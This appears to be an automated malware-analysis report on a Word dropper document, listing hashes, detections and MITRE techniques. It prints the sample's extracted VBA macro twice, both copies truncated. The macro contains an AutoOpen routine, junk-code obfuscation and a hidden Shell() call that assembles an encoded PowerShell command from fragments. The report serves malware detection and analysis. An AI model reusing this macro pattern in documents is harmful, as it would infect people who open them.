Office (OLE) malware analysis — malicious · f1bc87ea5542b1cd

MALICIOUS

Office (OLE)

108.2 KB Created: 2018-05-23 22:06:00 Authoring application: Microsoft Office Word First seen: 2019-09-30

MD5: 68ce658c9870ed773710af8f0b7cbdf1 SHA-1: 5ac222962605d9b2e220a956b006f491d876326d SHA-256: f1bc87ea5542b1cd319e6494b2229bb1398ddcbfec8d81c66fcce3b9a67ee6d6

242 Risk Score

Malware Insights

MITRE ATT&CK

T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The Autoopen macro triggers a Shell() call, which executes a PowerShell command. This command is obfuscated but appears to be designed to download and execute a second-stage payload, as indicated by the ClamAV detection name 'Doc.Dropper.Agent'.

Heuristics 7

ClamAV: Doc.Dropper.Agent-6555314-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6555314-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15320 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	15320 bytes
SHA-256: `4d3f0fef59276cf23de97a124575be2774f6cf266e3e231b786e9bb0fa19fac6`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "GdEswVpwQSo" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function iuZAEiW() On Error Resume Next zkjim = cFocXs - Cos(pZHck) * 1 - Chr(73803) / 28466 - ChrB(XDtoPw) oUvJAQ = 68121 wSiPN = kpZRw - Cos(lWJHYf) * 1 - Chr(36612) / 54370 - ChrB(nuXdzQ) hNslG = 4344 iuZAEiW = FqNfhziY + PFDVqbAoP + ZbKinzvB + HpRniEwwPQ + cfrQGXvQp + iHqXlPVuM + FXolR + UOiinSm + YaUjYfZzmzY JCXBc = OTXRUs - Cos(LolVz) * 1 - Chr(13757) / 82004 - ChrB(YLlOo) IMYMY = 66969 End Function Sub Autoopen() On Error Resume Next AFBdq = STXFJG - Cos(IsbXnw) * 1 - Chr(22339) / 97021 - ChrB(qlnnWG) wEvKF = 21611 pHtzd (iuZAEiW) jrGRYr = FbHqH - Cos(kBYZX) * 1 - Chr(27489) / 29279 - ChrB(PqDSL) YANws = 95124 End Sub Function pHtzd(UjziHtpf) On Error Resume Next sjhhn = jkKfw - Cos(rWwjW) * 1 - Chr(74609) / 83588 - ChrB(UTACzM) cFNLwK = 9838 VrsjGf = FKHDUp - Cos(UrJABp) * 1 - Chr(47585) / 60398 - ChrB(hacHfz) zEmib = 78373 EOTHX = Shell(FkCdKp + Chr(vbKeyP) + zZXzBwfVio + UjziHtpf, vbHide) CkQrOp = vrpAkW - Cos(zIQTq) * 1 - Chr(25649) / 19916 - ChrB(iYzIr) wiKBf = 24656 End Function Attribute VB_Name = "QlzKpimi" Function FqNfhziY() On Error Resume Next wLusT = NrGQH - Cos(wSMRk) * 1 - Chr(73425) / 17732 - ChrB(SaCwi) WtWTrD = 75141 OGCiQ = "owersHeLL -WinD" + "owsTyle hi" + "dden -e" + " IABp" iFaiYO = whzIw - Cos(IZsBjO) * 1 - Chr(13873) / 93095 - ChrB(IwKfs) UmZEi = 36259 JPJWJTjk = "AGUAWAAgACgAKA" + "AoACIAew" + "A0ADQA" + "fQB7ADEAMAA0" + "AH0AewA5ADgA" + "fQB7ADEA" + "fQB7ADYAOQB9" + "AHsAOAAyAH0AewA" HqGNuk = tCnlC - Cos(TiSHo) * 1 - Chr(61274) / 63987 - ChrB(wcTtW) dvaDS = 34516 ziJRhfl = "xADYAfQB" + "7ADIA" + "OQB9AHsAM" + "QAwADMAfQB7" SBvVT = cfFKZ - Cos(dApTRQ) * 1 - Chr(96774) / 72272 - ChrB(KOmUYj) zcjSkt = 2243 bQpajCjHYt = "ADEAO" + "QB9AHsAMgA" + "0AH0AewAxADg" + "AfQB7ADYAMgB9A" + "HsANgA2AH0Aew" + "A1ADQAfQB7ADgA" + "NQB9AHsAMQAx" + "ADQAfQB7ADYA" + "NQB9AH" WlUJEb = SuQsAo - Cos(JnUjoH) * 1 - Chr(74724) / 18258 - ChrB(ummhd) GrkzMw = 61485 SpjqWO = "sAMwAwAH0Aew" + "A3ADkAfQB7" + "ADgANgB" + "9AHsANQA4" + "AH0AewAyADUAf" ojFTwr = jiCWS - Cos(wEEtqN) * 1 - Chr(69602) / 49944 - ChrB(SuOro) HBbid = 85167 QkwVFoVz = "QB7ADcAMAB" + "9AHsAMQAwA" + "DYAfQ" + "B7ADcAf" + "QB7ADQAfQ" + "B7ADQ" zjoqSz = DkKKi - Cos(njFVj) * 1 - Chr(91882) / 41113 - ChrB(NKFEC) ZharpE = 36921 iizUvdRAc = "ANQB9" + "AHsANgA" + "wAH0A" + "ewAzA" + "DkAfQB7ADEAMA" + "AwAH0AewAzADMA" + "fQB7ADMA" + "NQB9AHsANwA0A" FqNfhziY = OGCiQ + JPJWJTjk + ziJRhfl + bQpajCjHYt + SpjqWO + QkwVFoVz + iizUvdRAc End Function Function PFDVqbAoP() On Error Resume Next VFAvm = TijDN - Cos(kbwGuh) * 1 - Chr(44061) / 26912 - ChrB(YjmPRp) JSUao = 66889 zEcKw = "H0AewAxADQAfQB7" + "ADkAMwB9A" + "HsAMwA2AH0" + "AewA0ADEAf" + "QB7ADgAOAB9A" + "HsANwAz" + "AH0AewAxA" + "DEANQB" AVoIJ = fbBqVu - Cos(kTwIhF) * 1 - Chr(35908) / 95435 - ChrB(NfVWw) QinsC = 32876 OVJakqMv = "9AHsANQAyAH0A" + "ewA4AD" + "kAfQB7ADYANAB9" + "AHsAM" + "QAxADMAfQB7ADU" + "AfQB7ADkANg" + "B9AHsAOAA0AH0A" + "ewAyAD" + "gAfQB7ADQAMgB9" lGYNPG = iwtWrl - Cos(VMsjQM) * 1 - Chr(59281) / 15618 - ChrB(nnBGK) Cdsjp = 66608 WsAfvzP = "AHsANwAxAH0AewA" + "xADAAfQB" + "7ADUANwB9AHsANg" + "AxAH0AewAxADA" + "AOQB9A" + "HsANAAwAH0AewA" + "xADAA" + "NwB9AHsANwA" + "3AH0AewA" jTpLAn = mwfLi - Cos(WuJmEQ) * 1 - Chr(55760) / 95605 - ChrB(aOAmPu) iKwHf = 55985 QRBpdz = "yADEAfQB7AD" + "QAOQB9AHsANwAy" + "AH0AewAzA" + "DQAfQB7ADUAM" + "QB9AH" tELrr = oHqXP - Cos(HTGcYF) * 1 - Chr(86270) / 96467 - ChrB(aKOXWW) UObPt = 41972 VJrFBkt = "sAOAB9AHsANwA4" + "AH0AewAyADM" + "AfQB7ADYANwB9AH" + "sANQA1AH0AewA" + "4ADAAfQB7ADEA" + "MQB9AHs" hsZlb = SYdXTm - Cos(XiXBmi) * 1 - Chr(60336) / 36457 - ChrB(zTUATn) wzClDY = 68863 otWfPXMzZj = "AMQAwADIAfQB7AD" + "EAMQAyAH0A" + "ewAxADA" + "AOAB9AHs" + "AMQAwADEA" + "fQB7ADIANgB9" + "AHsAOQA3AH0AewA" + "xADIA ... (truncated)

SHA-256: 4d3f0fef59276cf23de97a124575be2774f6cf266e3e231b786e9bb0fa19fac6

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "GdEswVpwQSo"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function iuZAEiW()
On Error Resume Next
zkjim = cFocXs - Cos(pZHck) * 1 - Chr(73803) / 28466 - ChrB(XDtoPw)
oUvJAQ = 68121
wSiPN = kpZRw - Cos(lWJHYf) * 1 - Chr(36612) / 54370 - ChrB(nuXdzQ)
hNslG = 4344
iuZAEiW = FqNfhziY + PFDVqbAoP + ZbKinzvB + HpRniEwwPQ + cfrQGXvQp + iHqXlPVuM + FXolR + UOiinSm + YaUjYfZzmzY
JCXBc = OTXRUs - Cos(LolVz) * 1 - Chr(13757) / 82004 - ChrB(YLlOo)
IMYMY = 66969
End Function
Sub Autoopen()
On Error Resume Next
AFBdq = STXFJG - Cos(IsbXnw) * 1 - Chr(22339) / 97021 - ChrB(qlnnWG)
wEvKF = 21611
pHtzd (iuZAEiW)
jrGRYr = FbHqH - Cos(kBYZX) * 1 - Chr(27489) / 29279 - ChrB(PqDSL)
YANws = 95124
End Sub
Function pHtzd(UjziHtpf)
On Error Resume Next
sjhhn = jkKfw - Cos(rWwjW) * 1 - Chr(74609) / 83588 - ChrB(UTACzM)
cFNLwK = 9838
VrsjGf = FKHDUp - Cos(UrJABp) * 1 - Chr(47585) / 60398 - ChrB(hacHfz)
zEmib = 78373
EOTHX = Shell(FkCdKp + Chr(vbKeyP) + zZXzBwfVio + UjziHtpf, vbHide)
CkQrOp = vrpAkW - Cos(zIQTq) * 1 - Chr(25649) / 19916 - ChrB(iYzIr)
wiKBf = 24656
End Function


Attribute VB_Name = "QlzKpimi"
Function FqNfhziY()
On Error Resume Next
wLusT = NrGQH - Cos(wSMRk) * 1 - Chr(73425) / 17732 - ChrB(SaCwi)
WtWTrD = 75141
OGCiQ = "owersHeLL -WinD" + "owsTyle hi" + "dden -e" + " IABp"
iFaiYO = whzIw - Cos(IZsBjO) * 1 - Chr(13873) / 93095 - ChrB(IwKfs)
UmZEi = 36259
JPJWJTjk = "AGUAWAAgACgAKA" + "AoACIAew" + "A0ADQA" + "fQB7ADEAMAA0" + "AH0AewA5ADgA" + "fQB7ADEA" + "fQB7ADYAOQB9" + "AHsAOAAyAH0AewA"
HqGNuk = tCnlC - Cos(TiSHo) * 1 - Chr(61274) / 63987 - ChrB(wcTtW)
dvaDS = 34516
ziJRhfl = "xADYAfQB" + "7ADIA" + "OQB9AHsAM" + "QAwADMAfQB7"
SBvVT = cfFKZ - Cos(dApTRQ) * 1 - Chr(96774) / 72272 - ChrB(KOmUYj)
zcjSkt = 2243
bQpajCjHYt = "ADEAO" + "QB9AHsAMgA" + "0AH0AewAxADg" + "AfQB7ADYAMgB9A" + "HsANgA2AH0Aew" + "A1ADQAfQB7ADgA" + "NQB9AHsAMQAx" + "ADQAfQB7ADYA" + "NQB9AH"
WlUJEb = SuQsAo - Cos(JnUjoH) * 1 - Chr(74724) / 18258 - ChrB(ummhd)
GrkzMw = 61485
SpjqWO = "sAMwAwAH0Aew" + "A3ADkAfQB7" + "ADgANgB" + "9AHsANQA4" + "AH0AewAyADUAf"
ojFTwr = jiCWS - Cos(wEEtqN) * 1 - Chr(69602) / 49944 - ChrB(SuOro)
HBbid = 85167
QkwVFoVz = "QB7ADcAMAB" + "9AHsAMQAwA" + "DYAfQ" + "B7ADcAf" + "QB7ADQAfQ" + "B7ADQ"
zjoqSz = DkKKi - Cos(njFVj) * 1 - Chr(91882) / 41113 - ChrB(NKFEC)
ZharpE = 36921
iizUvdRAc = "ANQB9" + "AHsANgA" + "wAH0A" + "ewAzA" + "DkAfQB7ADEAMA" + "AwAH0AewAzADMA" + "fQB7ADMA" + "NQB9AHsANwA0A"
FqNfhziY = OGCiQ + JPJWJTjk + ziJRhfl + bQpajCjHYt + SpjqWO + QkwVFoVz + iizUvdRAc
End Function
Function PFDVqbAoP()
On Error Resume Next
VFAvm = TijDN - Cos(kbwGuh) * 1 - Chr(44061) / 26912 - ChrB(YjmPRp)
JSUao = 66889
zEcKw = "H0AewAxADQAfQB7" + "ADkAMwB9A" + "HsAMwA2AH0" + "AewA0ADEAf" + "QB7ADgAOAB9A" + "HsANwAz" + "AH0AewAxA" + "DEANQB"
AVoIJ = fbBqVu - Cos(kTwIhF) * 1 - Chr(35908) / 95435 - ChrB(NfVWw)
QinsC = 32876
OVJakqMv = "9AHsANQAyAH0A" + "ewA4AD" + "kAfQB7ADYANAB9" + "AHsAM" + "QAxADMAfQB7ADU" + "AfQB7ADkANg" + "B9AHsAOAA0AH0A" + "ewAyAD" + "gAfQB7ADQAMgB9"
lGYNPG = iwtWrl - Cos(VMsjQM) * 1 - Chr(59281) / 15618 - ChrB(nnBGK)
Cdsjp = 66608
WsAfvzP = "AHsANwAxAH0AewA" + "xADAAfQB" + "7ADUANwB9AHsANg" + "AxAH0AewAxADA" + "AOQB9A" + "HsANAAwAH0AewA" + "xADAA" + "NwB9AHsANwA" + "3AH0AewA"
jTpLAn = mwfLi - Cos(WuJmEQ) * 1 - Chr(55760) / 95605 - ChrB(aOAmPu)
iKwHf = 55985
QRBpdz = "yADEAfQB7AD" + "QAOQB9AHsANwAy" + "AH0AewAzA" + "DQAfQB7ADUAM" + "QB9AH"
tELrr = oHqXP - Cos(HTGcYF) * 1 - Chr(86270) / 96467 - ChrB(aKOXWW)
UObPt = 41972
VJrFBkt = "sAOAB9AHsANwA4" + "AH0AewAyADM" + "AfQB7ADYANwB9AH" + "sANQA1AH0AewA" + "4ADAAfQB7ADEA" + "MQB9AHs"
hsZlb = SYdXTm - Cos(XiXBmi) * 1 - Chr(60336) / 36457 - ChrB(zTUATn)
wzClDY = 68863
otWfPXMzZj = "AMQAwADIAfQB7AD" + "EAMQAyAH0A" + "ewAxADA" + "AOAB9AHs" + "AMQAwADEA" + "fQB7ADIANgB9" + "AHsAOQA3AH0AewA" + "xADIA
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.